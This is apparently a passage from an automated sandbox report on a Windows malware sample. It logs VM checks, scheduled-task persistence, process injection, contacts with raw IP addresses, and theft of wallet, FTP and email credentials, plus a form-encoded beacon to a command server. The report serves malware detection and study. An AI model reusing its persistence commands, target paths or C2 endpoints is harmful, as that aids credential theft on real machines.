RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: {90150000-00E1-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: {90150000-00E2-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: {90150000-0115-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: {90150000-0117-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: {90150000-012B-0409-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: {91150000-0011-0000-0000-0000000FF1CE} base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: {AC76BA86-7AD7-FFFF-7B44-AC0F074E4100} base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}	1
RegOpenKeyExW March 30, 2023, 4:28 p.m.	regkey_r: {BB8B979E-E336-47E7-96BC-1031C1B94561} base_handle: 0x00000398 key_handle: 0x00000394 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}	1

Uses Windows utilities for basic Windows functionality (11 events)

cmdline	cmd.exe /c "wmic csproduct get uuid"
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\c5d2db5804\oneetx.exe" /F
cmdline	wmic path win32_VideoController get name
cmdline	systeminfo
cmdline	wmic os get Caption
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\c5d2db5804\oneetx.exe" /F
cmdline	wmic csproduct get uuid
cmdline	cmd /C "wmic path win32_VideoController get name"
cmdline	wmic cpu get name
cmdline	cmd /C "wmic cpu get name"
cmdline	cmd "/c " systeminfo

Executes one or more WMI queries which can be used to identify virtual machines (4 events)

wmi	SELECT Name FROM WIN32_PROCESSOR
wmi	SELECT * FROM Win32_Processor
wmi	SELECT * FROM Win32_ComputerSystem
wmi	SELECT UUID FROM Win32_ComputerSystemProduct

Communicates with host for which no DNS query was performed (7 events)

host	176.113.115.145
host	185.246.221.126
host	193.233.20.36
host	199.115.193.116
host	212.87.204.93
host	66.42.108.195
host	45.33.6.223

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory March 30, 2023, 4:28 p.m.	process_identifier: 2484 region_size: 204800 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000280	1	0	0

Attempts to identify installed AV products by installation directory (8 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web
file	C:\Users\test22\AppData\Local\Temp\SandboxieInstall.exe

Attempts to stop active services (2 events)

Time & API	Arguments	Status	Return	Repeated
ControlService March 30, 2023, 4:27 p.m.	service_handle: 0x0000000000c8cf40 service_name: None control_code: 1		0	0
ControlService March 30, 2023, 4:27 p.m.	service_handle: 0x0000000000c8d1e0 service_name: None control_code: 1		0	0

Installs itself for autorun at Windows startup (7 events)

reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP000.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP001.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP002.TMP\"
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3	reg_value	rundll32.exe C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\test22\AppData\Local\Temp\IXP003.TMP\"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Windows	reg_value	C:\Users\test22\AppData\Local\Temp\Updater.exe
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\c5d2db5804\oneetx.exe" /F
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\test22\AppData\Local\Temp\c5d2db5804\oneetx.exe" /F

Attempts to access Bitcoin/ALTCoin wallets (1 event)

file	C:\Users\test22\AppData\Roaming\Electrum\wallets

Attempts to disable Windows Auto Updates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU\NoAutoUpdate

Harvests credentials from local FTP client softwares (2 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml

Executes one or more WMI queries (13 events)

wmi	SELECT * FROM Win32_VideoController
wmi	SELECT * FROM AntivirusProduct
wmi	SELECT * FROM Win32_OperatingSystem
wmi	SELECT * FROM Win32_Process Where SessionId='1'
wmi	SELECT Name FROM WIN32_PROCESSOR
wmi	SELECT * FROM Win32_ComputerSystem
wmi	SELECT UUID FROM Win32_ComputerSystemProduct
wmi	SELECT * FROM AntiSpyWareProduct
wmi	SELECT * FROM FirewallProduct
wmi	SELECT * FROM Win32_DiskDrive
wmi	SELECT * FROM Win32_Processor
wmi	SELECT Name FROM win32_VideoController
wmi	SELECT Caption FROM Win32_OperatingSystem

Collects information about installed applications (50 out of 114 events)

Time & API	Arguments	Status
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Excel MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft PowerPoint MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Publisher MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Outlook MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Word MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - English regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Outils de vérification linguistique 2013 de Microsoft Office - Français regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - Español regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft InfoPath MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft DCF MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft OneNote MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Groove MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM UX MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Lync MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 ActiveX regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Flash Player 13 NPAPI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe Acrobat Reader DC MUI regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000394 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.24215 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{d992c12e-cab2-426f-bde3-fb8c53950b0d}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000290 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000290 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000290 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000290 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000290 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000290 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000290 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000290 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000290 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000290 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000290 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExW March 30, 2023, 4:28 p.m.	key_handle: 0x00000290 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1

Harvests credentials from local email clients (4 events)

file	C:\Users\test22\Documents\Outlook 파일\Outlook.pst
file	C:\Users\test22\AppData\Local\Thunderbird\Profiles\hzkyl8yo.default
file	C:\Users\test22\AppData\Roaming\Thunderbird\Profiles\hzkyl8yo.default
file	C:\Users\test22\AppData\Roaming\Thunderbird\profiles.ini

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2188 called NtSetContextThread to modify thread in remote process 2484
NtSetContextThread March 30, 2023, 4:28 p.m.	registers.eip: 2005598660 registers.esp: 1440708 registers.edi: 0 registers.eax: 4306334 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x00000278 process_identifier: 2484	1	0	0

Appends a known multi-family ransomware file extension to files that have been encrypted (3 events)

file	C:\Users\test22\AppData\Roaming\Exodus\exodus.wallet
file	C:\Users\test22\AppData\Roaming\Mozilla\Firefox\Profiles\1pfa5s83.default-release\parent.lock
file	C:\Users\test22\AppData\Roaming\Thunderbird\Profiles\g8t0pe67.default-release\parent.lock

A process performed obfuscation on information about the computer or sent it to a remote location indicative of CnC Traffic/Preperations. (12 events)

Time & API	Arguments	Status	Return
HttpSendRequestA March 30, 2023, 4:28 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.69&sd=d5c6a6&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA March 30, 2023, 4:28 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.69&sd=d5c6a6&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA March 30, 2023, 4:28 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.69&sd=d5c6a6&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA March 30, 2023, 4:28 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.69&sd=d5c6a6&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA March 30, 2023, 4:28 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.69&sd=d5c6a6&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA March 30, 2023, 4:28 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.69&sd=d5c6a6&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
HttpSendRequestA March 30, 2023, 4:28 p.m.	headers: Content-Type: application/x-www-form-urlencoded request_handle: 0x00cc000c post_data: id=832866432405&vs=3.69&sd=d5c6a6&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=1	1	1
